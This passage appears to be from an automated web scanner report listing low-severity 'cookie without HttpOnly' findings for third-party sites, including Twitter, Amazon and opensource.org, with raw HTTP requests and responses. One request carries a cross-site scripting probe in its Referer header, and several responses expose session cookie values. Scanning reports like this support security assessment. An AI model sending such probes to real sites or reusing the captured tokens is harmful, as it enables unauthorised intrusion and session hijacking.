Set-Cookie: sh2=cso%3D4d4b1127%3Bslu%3D0%3Bref%3Dsh; expires=Sat, 04-Feb-2012 20:33:43 GMT; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: shabts=none; expires=Mon, 04-Apr-2011 20:33:45 GMT; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: shut=deleted; expires=Wed, 03-Feb-2010 20:33:44 GMT; path=/
Set-Cookie: shmk=deleted; expires=Wed, 03-Feb-2010 20:33:44 GMT; path=/
Set-Cookie: shup=fvt%3D4d4b1127%26ncs%3D1%26lst%3D4d4b1129; expires=Sat, 05-Mar-2011 20:33:45 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 43053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="html" dir="ltr" xml:lang="en" lang="en" xmlns="http://www.w3.org/199
...[SNIP]...

13.29. http://opensource.org/licenses/lgpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://opensource.org
Path:   /licenses/lgpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/lgpl-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:57 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=c3sfkjibjtrtb256rtno58s211; expires=Sat, 26-Feb-2011 23:23:17 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:16 GMT
ETag: "d39634045e5eb23dc4c9c24e32c8a468"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 6921
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.30. http://opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:00 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=ljh26ohmvvnl63npbjcqcrvk23; expires=Sat, 26-Feb-2011 23:23:20 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:17 GMT
ETag: "75b452b371f037c225405bd71e3aff0a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.31. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 03 Feb 2011 17:52:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

13.32. http://trc.taboolasyndication.com/dispatch/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:52:28 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=4c66d115-8de0-434d-9ff5-5470c9ca620e;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Set-Cookie: taboola_session_id_veoh=v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348;Path=/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Set-Cookie: taboola_rii_veoh=7442879704085952417_1039225080754099931;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 9148

trc_json_response =
{"trc":{"user-id":"4c66d115-8de0-434d-9ff5-5470c9ca620e","session-data":"v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348","video-list
...[SNIP]...

13.33. http://twitter.com/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Thu, 03 Feb 2011 19:19:18 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00233
Content-Type: text/html; charset=utf-8
Content-Length: 119
Cache-Control: no-cache, max-age=300
Set-Cookie: k=173.193.214.243.1296760758598311; path=/; expires=Thu, 10-Feb-11 19:19:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129676075859926793; path=/; expires=Sat, 05 Mar 2011 19:19:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCEnh9uwtAToOcmV0dXJuX3RvIhxodHRwOi8v%250AdHdpdHRlci5jb20vaG9tZToHaWQiJWY0NWVhYTM0NjI3NmM1ODJiYmEzMGZj%250AMjM3N2UyYjkzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--b39156638e0fd7387d15e0a4ebb19b4b1becdcf0; domain=.twitter.com; path=/
Expires: Thu, 03 Feb 2011 19:24:18 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>

13.34. http://twitter.com/supermedia  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /supermedia

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supermedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296760753-13380-14514
ETag: "980457e03ec8c8ddfb67fd40ecd97bea"
Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT
X-Runtime: 0.01072
Content-Type: text/html; charset=utf-8
Content-Length: 50851
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

13.35. http://videos.smartdesis.com/12948/watch-robo-telugu-movie-online/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /12948/watch-robo-telugu-movie-online/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /12948/watch-robo-telugu-movie-online/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1190ec8918d40851363fa60d5b1876bc; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.36. http://videos.smartdesis.com/12962/watch-mahesh-khaleja-movie-online-tc-rip/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f70cf1b1d146bbdac6f6e4323000a5a0; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.37. http://videos.smartdesis.com/13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c8a61672d2ee972f173196ceee739cc4; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.38. http://videos.smartdesis.com/13201/watch-rakht-charitra-2-movie-online/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /13201/watch-rakht-charitra-2-movie-online/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /13201/watch-rakht-charitra-2-movie-online/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ea0ddc1f107ac0ebee15071a4b6732b0; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.39. http://videos.smartdesis.com/hindi-online-movies-index/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /hindi-online-movies-index/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hindi-online-movies-index/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7456e574e55fb97ae5eb9ad3caf48919; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.40. http://videos.smartdesis.com/page/2/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /page/2/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /page/2/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4a22e9dc4b28418100a379012fe5689e; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.41. http://videos.smartdesis.com/tamil-online-movies-index/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /tamil-online-movies-index/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tamil-online-movies-index/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=080d4866fbd5b5816cc5bbde5d18c081; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.42. http://videos.smartdesis.com/telugu-online-movies-index-a/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /telugu-online-movies-index-a/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /telugu-online-movies-index-a/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4c1e6e6a8f7ca1c6adde18d7254993a5; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.43. http://videos.smartdesis.com/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d63972255e4dc639aef9ed15da38a8a8; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

13.44. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 350615


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

13.45. http://www.amazon.com/s/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /s/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315


<html>
<head>


<meta http-equiv="content-type" content="tex
...[SNIP]...

13.46. http://www.atlastravelweb.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.atlastravelweb.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atlastravelweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68752
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

13.47. http://www.bizfind.us/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15367
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=PLLOGJOBELDIIOJMCOMKFGEL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...

13.48. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
